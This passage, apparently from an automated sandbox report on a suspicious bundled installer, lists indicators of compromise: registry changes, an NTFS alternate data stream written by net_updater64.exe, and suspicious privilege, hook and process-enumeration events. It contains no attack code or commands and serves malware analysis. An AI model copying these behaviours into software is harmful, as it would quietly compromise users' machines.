Computing\WinZip\WXF\WzWXFmfire\Default\MaxUploadSizeMB = "0" winzip64.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Nico Mak Computing\WinZip\WXF\WzWXFzshare\Default winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\caution\ErrDelFileCaution = "0" winzip64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople net_updater64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\fm\.B64 = "1" winzip64.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Nico Mak Computing\WinZip\Programs winzip64.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Nico Mak Computing\WinZip\WXF\WzWXFlpd WzCABCacheSyncHelper64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Excel\AddIns\WinZipExpressForOffice.AddinModule\LoadBehavior = "3" adxregistrator.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\WXF\WzWXFgdrv\Default\MaxUploadSizeMB = "0" winzip64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA net_updater64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\WXF winzip64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\PowerPoint\AddIns\WinZipExpressForOffice.AddinModule\CommandLineSafe = "0" adxregistrator.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\fm\shlExt = "1" winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\WXF\WzWXFdbox\Default\WritableRootFolder = "\\" winzip64.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Nico Mak Computing\WinZip\WXF\WzWXFlh WzCABCacheSyncHelper64.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Nico Mak Computing\WinZip\WXF\WzWXFog WzCABCacheSyncHelper64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\winzip\RunPreLoader = "20" winzip64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs net_updater64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\fm\.ZIPX = "1" winzip64.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Nico Mak Computing\WinZip\WXF\WzWXFdbox\Default winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\fm\.TXZ = "1" winzip64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\WXF\WzWXFcldme winzip64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\mru\archives winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Word\AddIns\WinZipExpressForOffice.AddinModule\ADXStartMode = "FIRSTSTART" adxregistrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\winzip\SpanDefault = "0" winzip64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Corel\PCU\HFNCv2 = "E62D9FD3CB0B" winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\fm\.TBZ = "1" winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" net_updater64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\fm\.ZIP = "1" winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\ListView\ListFormat1 = "4" winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Excel\AddIns\WinZipExpressForOffice.AddinModule\Description = "AddinModule" adxregistrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing net_updater64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\winzip\Adjustable = "1" winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\winzip\ExeBits = "64" winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\ListView\FullRowSelect = "1" winzip64.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Nico Mak Computing\WinZip\WXF\WzWXFivrs WzCABCacheSyncHelper64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" winzip64.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Nico Mak Computing\WinZip\WXF\WzWXFlf WzCABCacheSyncHelper64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft adxregistrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Nico Mak Computing\WinZip\WXF\WzWXFbox\Default winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\Common\Email\Services\ = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><mailservices default=\"Gmail\"><mailservice name=\"Gmail\" login=\"yes\" help=\"yes\" encryption=\"tls\"><smtp server=\"smtp.gmail.com\" port=\"587\"/><domains>gmail.com</domains></mailservice><mailservice name=\"Hotmail\" login=\"yes\" help=\"no\" encryption=\"tls\"><smtp server=\"smtp.office365.com\" port=\"587\"/><domains>hotmail.*;live.*;msnhotmail.com</domains></mailservice><mailservice name=\"Yahoo!\" login=\"yes\" help=\"yes\" encryption=\"none\"><smtp server=\"plus.smtp.mail.yahoo.com\" port=\"465\"/><domains>yahoo.com;sbcglobal.com</domains></mailservice><mailservice name=\"Outlook.com\" login=\"yes\" help=\"yes\" encryption=\"tls\"><smtp server=\"smtp.office365.com\" port=\"587\"/><domains>outlook.com;*.onmicrosoft.com</domains></mailservice></mailservices>" winzip64.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.wztheme\ = "WinZip.Theme" winzip64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vhd msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6D53EC84-6AAE-4787-AEEE-F4628F01010C}\TypeLib\ = "{1708F2CA-DCD5-4492-8260-FC9F58358478}" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Symantec.Norton.uiWebHost Process not Found Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.BZ WzPreviewer64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.tif winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{784C04A3-2E5A-4E7C-A7F7-7D97E27859AD}\ = "WinZip Autoplay" winzip64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinZip\shell\Open msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.iso\shell\Open\command\ = "\"C:\\Program Files\\WinZip\\winzip64.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.img\ShellEx\{8895B1C6-B41F-4C1C-A562-0D564250836F} WzPreviewer64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.VMDK\ShellEx\{8895B1C6-B41F-4C1C-A562-0D564250836F} WzPreviewer64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\166F59DC4C5A5F446AAACEDD192C1434\FAHEnglishFiles = "\x06FAH" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WzExpForSPExtension\ = "URL:WzExpForSPExtension Protocol" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79307-84BE-11CE-9641-444553540000}\InProcServer32\ThreadingModel = "Apartment" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32\3.5.15230.0 adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\166F59DC4C5A5F446AAACEDD192C1434\OneDriveCloudEnglishFiles = "OneDriveCloud" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinZip.Theme\ = "WinZip Theme Installation File" winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.img\shell\Print\ = "&Print file list" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\166F59DC4C5A5F446AAACEDD192C1434\MainGUIEnglishFiles = "MainGUI" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\166F59DC4C5A5F446AAACEDD192C1434\MediaFireCloud = "CloudSvc" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79304-84BE-11CE-9641-444553540000}\InProcServer32\ThreadingModel = "Apartment" winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79306-84BE-11CE-9641-444553540000}\ = "WinZip" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\166F59DC4C5A5F446AAACEDD192C1434\AllOtherFiles = "MainGUI" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\166F59DC4C5A5F446AAACEDD192C1434\BoxCloudFiles = "BoxCloud" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\166F59DC4C5A5F446AAACEDD192C1434\GoogleDriveCloudEnglishFiles = "GoogleDriveCloud" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.wzmul\ = "WinZip.RegFile" winzip64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\AppUserModelId\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}/BossLoader/BossLoader.exe\IconUri = "C:\\Users\\Admin\\AppData\\Local\\ToastNotificationManagerCompat\\Apps\\444E5A1B-F44C-A742-5F3A-106E50EBDCBF\\Icon.png" BossLoader.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinZip.RegFile\DefaultIcon\ = "C:\\Program Files\\WinZip\\WinZip64.exe,0" winzip64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.iso\ShellEx\{8895B1C6-B41F-4C1C-A562-0D564250836F}\ = "{E0D7930A-84BE-11CE-9641-444553540002}" WzPreviewer64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ShellEx\{8895B1C6-B41F-4C1C-A562-0D564250836F} WzPreviewer64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinZip\shellex\{8895B1C6-B41F-4C1C-A562-0D564250836F} winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79307-84BE-11CE-9641-444553540000}\ = "WinZip" winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinZip.RegFile\shell\open\ = "Register &WinZip" winzip64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6D53EC84-6AAE-4787-AEEE-F4628F01010C} Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.TAZ\ShellEx\{8895B1C6-B41F-4C1C-A562-0D564250836F} WzPreviewer64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinZip.ImageManager\DefaultIcon winzip64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79305-84BE-11CE-9641-444553540000}\InProcServer32 MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\166F59DC4C5A5F446AAACEDD192C1434\InstantMsgFiles = "InstantMsg" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\166F59DC4C5A5F446AAACEDD192C1434\Updater = "Complete" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1708F2CA-DCD5-4492-8260-FC9F58358478}\1.0\HELPDIR Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E0D79306-84BE-11CE-9641-444553540000} MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID adxregistrator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Component Categories\{62C8FE65-4EBB-45e7-B440-6E39B2CDBF29} adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\166F59DC4C5A5F446AAACEDD192C1434\ToolSettingFile = "ToolSetting" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinZip.RegFile\shell\open\command winzip64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1708F2CA-DCD5-4492-8260-FC9F58358478}\1.0\FLAGS Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Symantec.IPS.WebProtection Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\Symantec.Norton.Antivirus.IEContextMenu\ = "{FAD61B3D-699D-49B2-BE16-7F82CB4C59CA}" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.XX\ShellEx WzPreviewer64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\ProgId\ = "WinZipExpressForOffice.AddinModule" adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\166F59DC4C5A5F446AAACEDD192C1434\FTPCloudFiles = "FTPCloud" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\166F59DC4C5A5F446AAACEDD192C1434 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinZip\shellex\DropHandler MsiExec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202020202 Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FD7B051A-1E54-41f8-8A87-2F4349A8CCC8}\ProgID\ = "Symantec.Norton.uiWebHost" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E0D79304-84BE-11CE-9641-444553540000}\InProcServer32\ThreadingModel = "Apartment" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\WOW6432Node\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32 adxregistrator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinZip.RegFile\shell\open\command\ = "C:\\Program Files\\WinZip\\WinZip64.exe \"%1\"" winzip64.exe -
Modifies registry key 1 TTPs 16 IoCs
pid Process 3408 reg.exe 1144 reg.exe 6316 Process not Found 6112 reg.exe 4180 reg.exe 5104 reg.exe 3196 reg.exe 516 reg.exe 4428 reg.exe 1708 reg.exe 4480 reg.exe 3168 Process not Found 5280 Process not Found 1676 reg.exe 2300 reg.exe 5628 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\lum_sdk_session_id:LUM:$DATA net_updater64.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 7044 fdm.exe 3780 Process not Found 4680 Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4856 file.exe 4856 file.exe 4312 taskmgr.exe 4312 taskmgr.exe 2360 powershell.exe 2360 powershell.exe 3524 OWT.exe 3524 OWT.exe 1724 powershell.exe 1724 powershell.exe 3524 OWT.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 1512 chrome.exe 1512 chrome.exe 4580 chrome.exe 4580 chrome.exe 4364 chrome.exe 4364 chrome.exe 772 chrome.exe 772 chrome.exe 3732 chrome.exe 3732 chrome.exe 5092 chrome.exe 5092 chrome.exe 1908 chrome.exe 1908 chrome.exe 2696 chrome.exe 2696 chrome.exe 3232 chrome.exe 3232 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 2220 chrome.exe 4864 chrome.exe 4864 chrome.exe 1160 taskmgr.exe 1160 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
pid Process 1160 taskmgr.exe 8752 winzip64.exe 5864 winzip64.exe 8028 Process not Found 520 chrome.exe -
Suspicious behavior: LoadsDriver 13 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
pid Process 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe 4840 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4312 taskmgr.exe Token: SeSystemProfilePrivilege 4312 taskmgr.exe Token: SeCreateGlobalPrivilege 4312 taskmgr.exe Token: SeDebugPrivilege 4856 file.exe Token: SeDebugPrivilege 2360 powershell.exe Token: SeDebugPrivilege 3524 OWT.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeLockMemoryPrivilege 3736 vbc.exe Token: SeLockMemoryPrivilege 3736 vbc.exe Token: 33 4312 taskmgr.exe Token: SeIncBasePriorityPrivilege 4312 taskmgr.exe Token: SeDebugPrivilege 1160 taskmgr.exe Token: SeSystemProfilePrivilege 1160 taskmgr.exe Token: SeCreateGlobalPrivilege 1160 taskmgr.exe Token: SeDebugPrivilege 4468 OWT.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeLockMemoryPrivilege 2084 vbc.exe Token: SeLockMemoryPrivilege 2084 vbc.exe Token: SeDebugPrivilege 1284 OWT.exe Token: SeDebugPrivilege 2100 powershell.exe Token: SeLockMemoryPrivilege 980 vbc.exe Token: SeLockMemoryPrivilege 980 vbc.exe Token: SeSecurityPrivilege 5896 msiexec.exe Token: SeCreateTokenPrivilege 1824 winzip27.exe Token: SeAssignPrimaryTokenPrivilege 1824 winzip27.exe Token: SeLockMemoryPrivilege 1824 winzip27.exe Token: SeIncreaseQuotaPrivilege 1824 winzip27.exe Token: SeMachineAccountPrivilege 1824 winzip27.exe Token: SeTcbPrivilege 1824 winzip27.exe Token: SeSecurityPrivilege 1824 winzip27.exe Token: SeTakeOwnershipPrivilege 1824 winzip27.exe Token: SeLoadDriverPrivilege 1824 winzip27.exe Token: SeSystemProfilePrivilege 1824 winzip27.exe Token: SeSystemtimePrivilege 1824 winzip27.exe Token: SeProfSingleProcessPrivilege 1824 winzip27.exe Token: SeIncBasePriorityPrivilege 1824 winzip27.exe Token: SeCreatePagefilePrivilege 1824 winzip27.exe Token: SeCreatePermanentPrivilege 1824 winzip27.exe Token: SeBackupPrivilege 1824 winzip27.exe Token: SeRestorePrivilege 1824 winzip27.exe Token: SeShutdownPrivilege 1824 winzip27.exe Token: SeDebugPrivilege 1824 winzip27.exe Token: SeAuditPrivilege 1824 winzip27.exe Token: SeSystemEnvironmentPrivilege 1824 winzip27.exe Token: SeChangeNotifyPrivilege 1824 winzip27.exe Token: SeRemoteShutdownPrivilege 1824 winzip27.exe Token: SeUndockPrivilege 1824 winzip27.exe Token: SeSyncAgentPrivilege 1824 winzip27.exe Token: SeEnableDelegationPrivilege 1824 winzip27.exe Token: SeManageVolumePrivilege 1824 winzip27.exe Token: SeImpersonatePrivilege 1824 winzip27.exe Token: SeCreateGlobalPrivilege 1824 winzip27.exe Token: SeShutdownPrivilege 1824 winzip27.exe Token: SeIncreaseQuotaPrivilege 1824 winzip27.exe Token: SeCreateTokenPrivilege 1824 winzip27.exe Token: SeAssignPrimaryTokenPrivilege 1824 winzip27.exe Token: SeLockMemoryPrivilege 1824 winzip27.exe Token: SeIncreaseQuotaPrivilege 1824 winzip27.exe Token: SeMachineAccountPrivilege 1824 winzip27.exe Token: SeTcbPrivilege 1824 winzip27.exe Token: SeSecurityPrivilege 1824 winzip27.exe Token: SeTakeOwnershipPrivilege 1824 winzip27.exe Token: SeLoadDriverPrivilege 1824 winzip27.exe Token: SeSystemProfilePrivilege 1824 winzip27.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 3736 vbc.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe 4364 chrome.exe -
Suspicious use of SetWindowsHookAW 11 IoCs
pid Process 3444 winzip64.exe 5648 winzip64.exe 2768 winzip64.exe 5560 winzip64.exe 260 winzip64.exe 8752 winzip64.exe 5864 winzip64.exe 8028 Process not Found 4972 Process not Found 1576 Process not Found 6740 Process not Found -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 3652 chrome.exe 2384 chrome.exe 3160 winzip27.exe 4400 winzip27.exe 1824 winzip27.exe 1824 winzip27.exe 1824 winzip27.exe 3444 winzip64.exe 3444 winzip64.exe 3444 winzip64.exe 3444 winzip64.exe 3444 winzip64.exe 5648 winzip64.exe 5648 winzip64.exe 2768 winzip64.exe 2768 winzip64.exe 5560 winzip64.exe 5560 winzip64.exe 260 winzip64.exe 260 winzip64.exe 260 winzip64.exe 260 winzip64.exe 260 winzip64.exe 260 winzip64.exe 2768 winzip64.exe 2768 winzip64.exe 2768 winzip64.exe 2768 winzip64.exe 4368 BossLoader - Installer.exe 5584 BossLoader.exe 5864 InstallerGUI.exe 4228 BossLoader.tmp 4552 BossLoader.exe 8752 winzip64.exe 8752 winzip64.exe 8752 winzip64.exe 8752 winzip64.exe 8752 winzip64.exe 8752 winzip64.exe 8752 winzip64.exe 8752 winzip64.exe 7044 fdm.exe 7044 fdm.exe 7044 fdm.exe 7044 fdm.exe 8084 helperservice.exe 7044 fdm.exe 7044 fdm.exe 5864 winzip64.exe 5864 winzip64.exe 5864 winzip64.exe 5864 winzip64.exe 5864 winzip64.exe 5864 winzip64.exe 5864 winzip64.exe 5864 